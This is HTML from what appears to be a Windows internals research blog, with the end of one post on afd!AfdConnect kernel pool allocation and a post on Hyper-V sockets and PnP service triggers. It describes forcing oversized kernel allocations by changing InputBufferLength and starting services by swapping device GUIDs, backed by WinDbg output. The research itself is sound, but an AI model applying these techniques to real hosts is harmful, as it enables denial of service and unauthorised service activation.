<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer,- 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength - 0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NtDeviceIoControlFile goes to execute of afd!AfdConnect function. It analyze InputBufferLength and, if it above AfdStandardAddressLength constant (eq 0x1C in Windows Server 2016) function, calls nt!ExAllocatePoolWithTagPriority </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID ExAllocatePoolWithTagPriority(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ POOL_TYPE PoolType,- NonPagedPoolNx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ SIZE_T NumberOfBytes,- (InputBufferLength-0xC)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG Tag,- AfdR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ EX_POOL_PRIORITY Priority - LowPoolPriority</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we change InputBufferLength parameter of ntdll!NtDeviceIoControlFile from 0x30 to 0x4FFFFFFF before execution, we get:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 ffff8b80`7489c678 fffff805`53c46d9f nt!ExAllocatePoolWithTagPriority</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 ffff8b80`7489c680 fffff803`57293180 afd!AfdConnect+0x36f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 ffff8b80`7489c820 fffff803`57292064 nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ffff8b80`7489c8e0 fffff803`572919e6 nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ffff8b80`7489ca20 fffff803`56fd5493 nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ffff8b80`7489ca90 00000000`52dd222c nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000200</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4ffffff3</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – buffer size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000052646641 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !poolused 2 AfdR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Sorting by NonPaged Pool Consumed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> NonPaged Paged</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Tag Allocs Used Allocs Used</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> AfdR 6 1 342 178 160 0 0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Afd remote address buffer , Binary: afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">TOTAL 6 1 342 178 160 0 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then user buffer (InputBuffer parameter) </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">will be copy to allocated kernel pool by memove. If you don’t allocate user buffer page fault exception may be generated during of copy, especially if buffer size was set to hundreds of megabytes (exception will be handled by afd!AfdExceptionFilter). This kernel pool is freed by nt!ExFreePoolWithTag at the end of afd!AfdConnect.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It was tested with Hyper-V Sockets, but probably, it will work with standard TCP\IP sockets too.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I believe, that LowPoolPriority parameter of nt!ExAllocatePoolWithTagPriority will not allow operation system to hang because of limited kernel pool size.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Tested on afd version:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>lmvm afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Image path: \SystemRoot\system32\drivers\afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Image name: afd.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Timestamp: Sat Oct 15 06:53:45 2016 (5801A849)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<br /></div>
</div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-63890081598707042672017-06-17T14:02:00.001-07:002017-06-17T14:11:47.867-07:00Hyper-V Sockets and PnP<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" id="docs-internal-guid-c5a49f74-b7d9-66ca-a81d-5d88beaa5614" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">How does Powershell Direct session work internally? When application, which uses Hyper-V socket, makes CONNECT call, root partition sends message to guest OS using winhvr!WinHvPostMessage:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc @rdx – before vmcall (part of message body)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36000 00000001 00000000 00000001 000000c4 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36010 00000001 00000000 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">999e53d4 4c3e3d5c</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> .........S..\=>L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#227b36020 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d0be7987 e156c06e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we look at the parameters of vmicvmsession, we find out, that it has trigger for start. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="91" src="https://lh5.googleusercontent.com/HrHnqjecjr34enDPKvNEMsq_afM6VqVM0Qkj-SHh06hfpeV1wvVgWKKVImLt9w2b6cNomvjunh2wBtcfHxcpfPfjQv0cR126RX68TGw0udkyF48Bj8xggXb5xQvg1Oz6omHQuvYTfy9a-6bhUw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="566" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the message was delivered to guest OS, vmbus driver added new interface: </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 nt!IoRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 Wdf01000!Mx::MxRegisterDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 Wdf01000!FxDeviceInterface::Register</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 Wdf01000!imp_WdfDeviceCreateDeviceInterface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbus!RootStartDeviceInterfaceByContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!VmbusTlXPartProcessNewConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">07 vmbus!RootNotifyDeviceInterfaceArrival</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 Wdf01000!FxWorkItem::WorkItemHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 Wdf01000!FxWorkItem::WorkItemThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d nt!KiStartSystemThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And PnP mechanism works:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Service trigger works and service starts. After that icsvc.dll configures socket and begins communication with Host OS.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is interesting that we can change that GUID to GUID of another device. We can get list of services, that have trigger on DEVICE INTERFACE ARRIVAL event:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">All Hyper-V guest services</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Bluetooth Support Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Camera Frame Server</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Human Interface Device Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Geolocation Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft Passport</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Portable Device Enumerator Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Sensor Monitoring Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Storage Service</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Touch Keyboard and Handwriting (probably)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And if we point that GUID in CONNECT call</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
